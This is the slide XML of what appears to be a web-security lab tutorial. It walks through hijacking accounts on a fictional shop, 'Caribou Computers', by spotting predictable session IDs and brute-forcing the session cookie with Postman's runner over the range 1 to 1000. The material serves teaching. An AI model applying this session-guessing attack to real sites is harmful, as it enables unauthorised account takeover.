              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So, all we need to do to gain access to someone else’s account is set our cookie equal to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unhashed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> value of any valid session key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>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id="{E729B4FA-4604-8801-6FD9-7B308E157AE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6652587" y="2120900"/>
            <a:ext cx="4739313" cy="3042025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3100120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The developer’s decision to hash the session key is actually a bit clever.  Even if someone compromises the database (like we just did) we don’t necessarily know the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>session_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of a particular user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now of course we could attempt to crack the hash but not all MD5 hashes are equally weak (and if we didn’t have inside information we might not know if it’s a MD5 hash or not).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, there is one other way that the security could be weak.  The session keys themselves could be predictable.</a:t>
            </a:r>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E628639-035A-63EE-C43B-6C26C7BF6368}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6652587" y="2120900"/>
            <a:ext cx="4739313" cy="3042025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56337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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What we want to find out is something about how the session numbers are assigned.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In order to do so we need to force the application to generate a lot of them!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Postman has an option to create accounts.  We can do just that!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>But first we need to get rid of the cookie we have (since it keeps logging us in).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA18BB52-424A-A915-86A8-4AE8240A1BC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6652587" y="2120900"/>
            <a:ext cx="4739313" cy="3042025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3282755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10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are a lot of ways to manage cookies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We’ve mentioned using “Cookie Quick Manager” which you can add to Firefox by going here:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://addons.mozilla.org/en-CA/firefox/addon/cookie-quick-manager/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It allows you to enter the IP address of your  server and see the cookies that were set by it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can then select the “session” cookie and click the delete button to get rid of it.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02BB7780-2E80-4741-8132-02E7ECD830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6393" y="2120900"/>
            <a:ext cx="4058335" cy="4003828"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="196795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10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now we just type in a username and a password and click “Create Account”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We should be greeted with the message “Account &lt;account name&gt; created!”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now we log in and check the session cookie using our cookie manager.  In this case we got 83 (yours will be different).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now we delete the cookie and try it about 10 more times. The list of session keys we were sent were: 83, 636, 353, 871, 303, 578, 51, 820, 79, 470, 976</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0F998AD-CEC9-46AF-8460-B1E8FC06FF88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6065335" y="2117091"/>
            <a:ext cx="5289168" cy="1302796"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C96EDE2A-4545-49C7-AEF0-C60E76E063CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6126480" y="3799618"/>
            <a:ext cx="5243631" cy="1077832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1225410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Looking at these numbers it seems reasonable to guess that they are clustered around a particular range.  Probably between 1 and 1000.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>That is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>very</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> small range, and we can easily employ a simple technique to guess it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using the Postman application, we can create a new request to take advantage of this.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0F998AD-CEC9-46AF-8460-B1E8FC06FF88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6065335" y="2117091"/>
            <a:ext cx="5289168" cy="1302796"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C96EDE2A-4545-49C7-AEF0-C60E76E063CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6126480" y="3799618"/>
            <a:ext cx="5243631" cy="1077832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3587308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After opening Postman go up to the top left and select “new”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When the “Create New” menu comes up.  Select “HTTP Request”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>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srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6295188" y="1941188"/>
            <a:ext cx="5172272" cy="2524693"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDC25C8E-50B7-B1F4-D03E-739E32F18DC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6837132" y="4885292"/>
            <a:ext cx="3524742" cy="1117878"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3213350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Set up the URL to point to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>caribou_computers.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.  Then click on the “headers” tab.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add a header to the bottom called: “Cookie” in the value section type in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>session=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{{$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>randomInt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F26B3A"/>
              </a:solidFill>
              <a:effectLst/>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randomInt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> a built-in function that picks numbers between 1 and 1000.</a:t>
            </a:r>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7E24A58-3EC3-36C4-BFE6-D723D112815D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="2613302"/>
            <a:ext cx="5509474" cy="2606768"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="566595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a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now click on the “tests” tab.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scroll down the right-hand side and select the template named “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Response.body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> contains string”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alter the text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2A00FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2A00FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>string_you_want_to_search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2A00FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2A00FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> “Authentication failed”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Save this and then go to the top left menu (which looks like three lines) and select “File” and “New Runner Tab”</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srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5637060" y="2803172"/>
            <a:ext cx="6132106" cy="2044035"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2940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stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="535305" y="2514600"/>
            <a:ext cx="5718348" cy="2458889"/>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is an online shopping site which allows users to create accounts and examine the products Caribou Computers has for sale.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recently it has started an affiliate program.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>People who wish to earn credit with the Caribou Computers simply publish a link to their shopping site on their own site or Blog.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2210833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Click on your collection and drag the Request you just created over to the “Run Order” tab.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set iterations to 1000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check “Save Responses”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click Run…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>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1FD99340-6B41-7679-C124-2BABB151CFB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5988128" y="1955424"/>
            <a:ext cx="5737147" cy="4079143"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1555308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After your collection runs (which may take some time), you should see about 999 tests that “passed” (those are the ones where “Authentication failed” appeared.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As well as one which “failed”.  Click on the “Failed” tab to see that attempt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click on “New Request” and select “Request Headers” this will show you the session cookie number that successfully authenticated.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{429F1E56-DF96-C680-B452-A79E3917CD38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
